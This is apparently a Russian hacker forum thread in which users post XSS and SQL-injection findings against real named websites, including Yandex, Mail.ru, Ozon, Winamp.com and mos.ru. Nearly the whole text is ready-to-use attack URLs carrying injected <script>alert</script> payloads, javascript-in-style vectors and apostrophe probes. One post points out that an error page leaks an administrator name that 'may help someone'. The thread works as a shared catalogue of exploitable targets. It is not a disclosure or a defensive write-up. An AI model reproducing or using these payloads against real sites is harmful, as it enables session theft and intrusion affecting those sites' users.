Баги на сайтах.

Yandex
http://search.yaca.yandex.ru/yandsearch?text=url%3D%22www.antichat.ru*%22&rpt="><script>alert("found_by_Glance")</script>

 

XSS В Апорте:
_http://sm.aport.ru/scripts/template.dll?That=std&r=LOL"><script>alert(/SLIP/)</script>

 

XSS AltaVista:
_http://av.rds.yahoo.com/_ylt=A9ibyKYyWWxEDRIBWWFSDqMX;_ylu=X3oDMTBxMXBrZzZzBHBndANhdl93ZWJfaG9tZQRzZWMDc2VhcmNo/SIG=11ofahvej/EXP=1148037810/*-http%3A//www.altavista.com/web/results?itag=ody&q=LOOL&kgs=0&kls=0"><script>alert(/SLIP/)</script>

 

XSS:

_http://www.delphimaster.ru/cgi-bin/search.pl?words=%3Cscript%3Ealert%28%2FNeX+aka+Neo%2F%29%3C%2Fscript%3E&n=0

 

Ещё пачка xss:
_http://tourism.at.ru/htsearch.cgi?config=tourism&method=and&format=flong&words=%3Cscript%3Ealert%28%2FSLIP%2F%29%3C%2Fscript%3E"><script>alert(/SLIP/)</script>

_http://hp.qsrch.com/apps/eps/eps.cgi?Keywords=%3Cimage+style%3Dbackground%3Aurl%28javascript%3Aalert%28%2FSLIP%2F%29%29%3E&loc=ST&upartner=hp03&ps=H3OTGE

_http://www.db.am/search/?wrds=%3Cimage%20style%3Dbackground%3Aurl%28javascript%3Aalert%28%2FSLIP%2F%29%29%3E&pg=&cat=&pa=&pb=&oo=

_http://capel.ru/search.php?search=%3Cscript%3Ealert%28%27SLIP%27%29%3C%2Fscript%3E

_http://www.labar.ru/?ann=0&str=%3Cscript%3Ealert%28%2FSLIP%2F%29%3C%2Fscript%3E

_http://www.search.uz/go.php?w=%3Cscript%3Ealert%28%2FSLIP%2F%29%3C%2Fscript%3E&where=directory&action=search&Submit=%EF%EE%E8%F1%EA

 

_http://www.smchat.ru/chat.php?chatname=%3Cscript%3Ealert();%3C/script%3ESAMPLE

 

Всем привет) Вот прошёлся по сайтам в которых есть поисковые системы)

_http://eda-server.ru/cgi-bin/search/search.pl?stype=AND&stpos=0&query=%3Cscript%3Ealert%28%2FSLIP%2F%29%3C%2Fscript%3E&ok2.x=33&ok2.y=11

_http://www.printinfo.ru/searchRes.asp?SST=LOL"><script>alert(/slip/)</script>

_http://www.xfiles.ru/sudis/?action=search&vopros=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&stype=txt

_http://www.ural.ru/index/ru?act=search&SM=UralOnline&qs=slip"><script>alert(/slip/)</script>

_http://www.bizcenter.com.ua/search.php?sf=slip&wh=2"><script>alert(/slip/)</script>

_http://www.itshop.ru/dynacatalog.asp?words=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E

_http://www.infocity.kiev.ua/search.php?newsearch=1&name=on&autor=on&des=on&sline=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E

_http://www.koders.com/?s=slip&_%3Abtn=Search&_%3Ala=*&_%3Ali=*"><script>alert(/slip/)</script>

Всё, на сегодня хватит)

 

_http://www.crpg.ru//header.php (мля, прямо не сайт, а один сплошной баг )
_http://www.nevasport.ru/news.php?id=12061'
_http://www.southexpo.ru/expo/detail.asp?id=529'
_http://www.southexpo.ru/expo/detail.asp?id=52.9
_http://www.southexpo.ru/expo/detail.asp?id=52,9
_http://www.mos.ru/cgi-bin/pbl_web?vid=1&osn_id=0' (в мыльнике имеем имя админа, может, кому-то что-то и даст)
_http://www.telcenter.ru/page.php?pageId=52'
_http://www.ht.ru/on-line/forum/?forum=7&topic=547'
_http://www.magazin.ru/scripts/magazin/Dir.pl?dir=%2F%27%D4%EE%F2%EE%F2%E5%F5%ED%E8%EA%E0&cont=on&search=%3Cscript%3Ealert%28%2Fok%2F%29%3C%2Fscript%3E
_http://www.stroylocman.ru/cats.html?q=%3Cscript%3Ealert%28%27f0und+by+back0rifice%27%29%3C%2Fscript%3E

 

_hxxp://www.telecom.kz/index.php?content='
_hxxp://www.mospat.ru/index.php?mid=84

 

_http://www.ozon.ru/context/kidworld_detail/id/2266364/default.aspx?Name=&Title="&
gt;<script>alert()</script>&EMail=&Description="><script>
;alert()</script>&Country=Россия/&ViewComment=Просмотреть#comment
_http://ishodniki.ru/ilook/search.php?query='style=background:url(JaVaScRiPt:alert());&
m=or
_http://by.ru/cat.cgi?query="><script>alert()</script>
_http://linuxcenter.ru/news/2005<textarea>/11
_http://www.koders.com/?s="><script>alert()</script>&_:btn=Search&a
mp;_:la=*&_:li=*
_http://www11.pochta.ru/info.php?mid=agreement&lng=ru"><script>alert()</script>
_http://games.icq.com/?code=110272767&RefId=910"><script>alert()</script>&lc=en
_http://aromas.ru/forum/search.php?text_poisk='

 

Вот в дополнение к тем xss в поисковиках, которые лежат на предыдущей странице этой темы)
_http://search.km.ru/index.asp?sq=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E
_http://directory.jayde.com/search?a=0&query=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&search=search

 

XSS на Mail.Ru
http://top3.mail.ru/stat?id=110605;what="><script>alert("found_by_gLAnce")</script><xml>

 

XSS на Hotbox.ru

_http://www.hotbox.ru/help.php?lng=ru&skin=pochta_ru"><script>alert(/slip/)</script>

_http://www3.pochta.ru/regform.php?sid=e2314aca38596502e5d4c0605802d511&lng=ru&rnd=517025057"><script>alert(/slip/)</script>

 

XSS на Jino.ru


http://jino.ru/buywizard.phtml?dom=%3Cscript%3Ealert();%3C/script%3Eicq&tld=ru&price=14.99

http://jino.ru/buywizard.phtml?dom=icq&tld=%3Cscript%3Ealert();%3C/script%3Eru&price=14.99


XSS на post.kards.ru


http://post.kards.ru/?act=search&level=6&search_str=%22%3E%3Cscript%3Ealert();%3C/script%3E&site_id=2


XSS на forum.nokia.com


http://sn.nokia.com/search?keywords=%22%3E%3Cscript%3Ealert();%3C/script%3E

 

На игромании выкопал:
_http://search.igromania.ru:17000/igromania?text=has"><script>alert(/slip/)</script>

 

Зашёл за свежим винампом на оффициальный сайт, в глаза сразу бросился поиск по сайту, вообще ничего не фильруется, всё сразу принял):
_http://www.winamp.com/videos/search.php?q=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E

 

Вот ещё с Winamp.com


http://www.winamp.com/videos/browse.php?&genre=Pop%3Cscript%3Ealert();%3C/script%3E&type=video

 

_http://www.club.veresk.ru/?part_id=17'

 

Хакерский сайт
_http://pro-hack.ru/archive/search.php?news=on&exploit=on&download=on"><script>alert(/slip/)</script>
Это просто так:
_http://www.zachot.ru/index.php?id=2&letter=Н"><script>alert(/slip/)</script>

 

http://www.amik.ru/?page=search&step=1&keywords="><script>alert()</script>&how=0 в поиске.
Помимо этого есть активная XSS в самой почте, выкладывал где-то месяц-два назад.
Если кому интересно о чем там пишет масляков... ))